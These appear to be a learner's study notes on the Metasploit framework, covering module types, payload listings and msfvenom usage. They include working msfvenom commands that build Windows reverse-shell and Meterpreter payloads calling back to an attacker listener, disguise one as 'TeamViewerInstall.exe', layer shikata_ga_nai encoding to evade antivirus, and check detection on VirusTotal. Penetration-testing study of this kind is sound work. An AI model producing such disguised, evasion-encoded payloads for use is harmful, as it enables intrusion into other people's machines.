Find the metasploit modules in: /usr/share/metasploit-framework/modules
Plugins: /usr/share/metasploit-framework/plugins/
Scripts: /usr/share/metasploit-framework/scripts/
To start msfconsole without banner, use -q
Can use for:
Enumeration
Preparation
Exploitation
Privilege Escalation
Post-Exploitation
Types of modules:
Auxiliary Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
Encoders Ensure that payloads are intact to their destination.
Exploits Defined as modules that exploit a vulnerability that will allow for the payload delivery.
NOPs (No Operation code) Keep the payload sizes consistent across exploit attempts.
Payloads Code runs remotely and calls back to the attacker machine to establish a connection (or shell).
Plugins Additional scripts can be integrated within an assessment with msfconsole and coexist.
Post Wide array of modules to gather information, pivot deeper, etc.
Auxiliary Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
Exploits Defined as modules that exploit a vulnerability that will allow for the payload delivery.
Post Wide array of modules to gather information, pivot deeper, etc.
For example, we can try to find the EternalRomance exploit for older Windows operating systems. This could look something like this:
Don't forget the command info
setg to set a permanent until program is restarted
setg rhosts <host>
we can combine payloads with: GentilKiwi's Mimikatz Plugin
We can use grep when searching for payloads. grep meterpreter grep reverse_tcp show payloads
help is available in metasploit
generic/custom Generic listener, multi-use
generic/shell_bind_tcp Generic listener, multi-use, normal shell, TCP connection binding
generic/shell_reverse_tcp Generic listener, multi-use, normal shell, reverse TCP connection
windows/x64/exec Executes an arbitrary command (Windows x64)
windows/x64/loadlibrary Loads an arbitrary x64 library path
windows/x64/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/x64/shell_reverse_tcp Normal shell, single payload, reverse TCP connection
windows/x64/shell/reverse_tcp Normal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcp Normal shell, stager + stage, IPv6 Bind TCP stager
windows/x64/meterpreter/$ Meterpreter payload + varieties above
windows/x64/powershell/$ Interactive PowerShell sessions + varieties above
windows/x64/vncinject/$ VNC Server (Reflective Injection) + varieties above
The different encoders: x64 x86 sparc ppc mips
We will always need to encode our payload according to our target architecture
msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai
or with msvenom
without encoding:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
w. encoding:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
read more about shikata_ga_nai encoding
we can select encoders with: show encoders & set encoders
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
If we were to encode an executable payload only once with SGN, it would most likely be detected by most antiviruses today. Let's delve into that for a moment. Picking up msfvenom, the subscript of the Framework that deals with payload generation and Encoding schemes, we have the following input:
One better option would be to try running it through multiple iterations of the same Encoding scheme:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
msf-virustotal that can use with an API key to analyze our payloads. However this requires free registration on virustotal.
msf-virustotal -k <API key> -f TeamViewerInstall.exe